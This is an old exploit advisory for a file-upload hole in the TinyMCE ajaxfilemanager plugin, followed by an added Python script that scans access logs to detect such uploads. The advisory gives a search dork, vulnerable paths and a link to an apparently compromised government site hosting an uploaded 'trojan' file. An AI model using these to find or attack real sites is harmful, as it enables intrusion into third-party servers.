TinyMCE AjaxFileManager Shell Upload



EKU-ID: 370 CVE: OSVDB-ID:
Author: Dr Trojan Published: 2011-05-31 Verified: Not Verified


#########################################################
# Title : TinyMCE ajaxfilemanager Upload Vulnerability
# Author: Dr Trojan
# Greets to all my friends and everyone I know (www.paksecteam.com)
# Vendor: http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# Email : urduhack@gmail.com
# Date : 29/05/2011
# Dork : "tiny_mce/plugins/ajaxfilemanager"
# Category  : PHP [File Upload Vulnerability]
# Tested on: [Windows 7, Linux Ubuntu]
#########################################################
Exploit
# http://[localhost]/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# http://[localhost]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# File Extension [.txt],[.jpg],[.gif],[.bmp]
Demo
http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#
Preview
http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt
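
Detection note (an added example, not part of the original advisory): a site owner can review web server access logs for clients that POST to the ajaxfilemanager path named above and then fetch a file from the upload directory. The Combined Log Format, the `/uploaded/` directory name and the sample log lines are assumptions constructed for illustration.

```python
import re

# Path fragment taken from the advisory's dork.
MANAGER = "tiny_mce/plugins/ajaxfilemanager/"
# Assumption: uploads are served from a directory like the one in the
# advisory's preview URL; adjust to the site's configured upload path.
UPLOAD_DIRS = ("/uploaded/",)

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [31/May/2011:10:00:01 +0000] "GET /jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php HTTP/1.1" 200 5120
198.51.100.7 - - [31/May/2011:10:00:09 +0000] "POST /jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php HTTP/1.1" 200 310
198.51.100.7 - - [31/May/2011:10:00:15 +0000] "GET /uploaded/temp/sample.txt HTTP/1.1" 200 42
203.0.113.20 - - [31/May/2011:10:01:00 +0000] "GET /uploaded/logo.jpg HTTP/1.1" 200 9001
192.0.2.44 - - [31/May/2011:10:02:00 +0000] "POST /jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php HTTP/1.1" 403 199
"""


def parse(log_text):
    """Yield (ip, method, path_without_query, status) for each parsable line."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ip, method, path, status = m.groups()
            yield ip, method, path.split("?", 1)[0], int(status)


def find_suspects(log_text):
    """Map each client that POSTed to the file manager (and was not refused)
    to the upload-directory files it fetched afterwards."""
    hits = {}
    for ip, method, path, status in parse(log_text):
        lowered = path.lower()
        if MANAGER in lowered and method == "POST" and status < 400:
            hits.setdefault(ip, [])
        elif ip in hits and method == "GET" and status == 200 \
                and any(d in lowered for d in UPLOAD_DIRS):
            hits[ip].append(path)
    return hits


if __name__ == "__main__":
    for client, files in find_suspects(SAMPLE_LOG).items():
        print(client, "POSTed to ajaxfilemanager, then fetched:", files or "nothing")
```

A client that appears in the result with an empty list still reached the file manager with a write request and is worth reviewing; the refused (403) request and the plain image fetch in the sample are not reported.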